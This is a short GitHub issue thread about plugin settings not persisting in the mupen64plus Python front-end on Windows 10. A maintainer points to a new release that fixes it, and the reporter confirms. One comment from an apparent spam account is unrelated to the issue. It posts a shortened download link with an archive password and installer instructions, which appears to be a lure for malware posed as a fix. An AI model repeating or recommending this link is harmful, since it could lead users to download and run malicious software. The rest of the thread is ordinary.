### ISSUE TITLE
plugin settings are not stored

### ISSUE THREAD

**Issue by Wronschien** [mupen64plus/mupen64plus-ui-python#230]
Hello, I'm new to mupen and using this front-end on Windows 10, I noticed that any change I make in a plugin setting doesn't carry to a new session. Is there something I miss ?
Btw, where's the "Data directory" path supposed to point to ? Currently it's empty and games run nicely.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by gen2brain** [comment]
Please try with the new release, this should be fixed.

**Comment by Wronschien** [comment]
It works indeed, thanks
